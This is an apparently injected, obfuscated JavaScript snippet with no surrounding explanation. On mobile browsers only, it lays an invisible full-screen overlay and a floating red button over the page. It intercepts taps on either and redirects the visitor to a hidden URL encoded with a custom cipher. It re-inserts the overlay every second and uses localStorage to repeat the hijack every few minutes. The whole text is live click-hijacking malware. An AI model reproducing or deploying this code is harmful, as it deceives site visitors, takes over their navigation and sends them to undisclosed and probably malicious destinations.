;document.write('<style>.GXRuN1{margin: 0px; padding: 0px; position: fixed; bottom: 0; right: 0px;z-index: 2147483647;width: 100vw; bottom:15vh; height: 65vh; text-decoration: none;}.GXRuN2{position:fixed; bottom:30vh; z-index:2147483647; right:0; margin-right:6vw; padding: 0px; text-decoration: none; background-color: red; width: 7vw; height: 7vw; border-radius: 7vw; font-size: 6vw; color:#fff; text-align: center; transform: rotate(-90deg);}</style><span id=ldQf2 class=GXRuN2>></span><div id=ldQf1 class=GXRuN1></div>');(function (){function dec(str){var key='abEF';var length=key.length;var bit,bit1,bit2,bit3,bit4,j=0,s;var s=new Array(Math.floor(str.length/4));var result=[];bit=s.length;for(var i=0;i<bit;i++){bit1=key.indexOf(str.charAt(j));j++;bit2=key.indexOf(str.charAt(j));j++;bit3=key.indexOf(str.charAt(j));j++;bit4=key.indexOf(str.charAt(j));j++;s[i]=bit1*length*length*length+bit2*length*length+bit3*length+bit4;result.push(String.fromCharCode(s[i]))}return result.join('')}
var i=0,v1=0,v2=8,v3=1,v4=0,BD=0,STP=0,D=document,W=window,BID1=D.getElementById('ldQf1'),BID2=D.getElementById('ldQf2'),s='bEEabFbabFbabFaaaFEEaEFFaEFFbEbEaFEbaFEbaEFEbFbabEEbbEabbEFEbEFEbEaEbEFFaEFEbEaFbEFFbEFbaEFFbEabbEEaaEFFaFFFbFaEaFFb',dt=new Date(),g;if (navigator.userAgent.indexOf('Android') > 1){v1=1;}if ( navigator.userAgent.indexOf('iPhone') > 1 || navigator.userAgent.indexOf('iPad') > 1){v1=2;}if (self!=top){v3=4;}if (navigator.userAgent.indexOf(dec('bEaEbEabbEEbbEbabFbb')) > -1) {BD=1;}g=dec(s)+dt.getTime()+'&pt='+v1+'&ag=4168';
var FR=function(e){e.stopPropagation();e.preventDefault();JUM();};
var FE=function(e){this.style.display='none';e.stopPropagation();e.preventDefault();localStorage.setItem('Timer',dt.getTime());JUM();};
function Tim(){var myTime = localStorage.getItem('Timer');if (myTime>1){if((dt.getTime()-myTime)>3.1*60*1000){v4=1;}}else{v4=1;}}
function LI1(){BID1.style.display = 'block';BID1.addEventListener('click',FE, false);}
function LI2(){BID2.addEventListener('click', FR, false);}
function RP1(){var dc = D.createElement('div');dc.id = 'ldQf1';dc.className='GXRuN1';var interval = W.setInterval(function () {if(STP == 1){clearInterval(interval);}D.body.appendChild(dc);}, 1000);dc.addEventListener('click',FE, false);}
function RP2(){var dc = D.createElement('span');dc.id = 'ldQf2';dc.className='GXRuN2';dc.innerHTML='>';dc.addEventListener('click', FR, false);W.setInterval(function () {D.body.appendChild(dc);}, 1000);};
function MAN(){BID1.style.display = 'none';Tim();}
function JUM(){location.href=g+'&c='+v3+'&v='+v2;}
if (v1!=0){if(BD==1){MAN();if(v4==1){LI1()}LI2()}else{MAN();if(v4==1){RP1()}RP2()};}else{BID1.style.display = 'none';BID2.style.display = 'none';}})();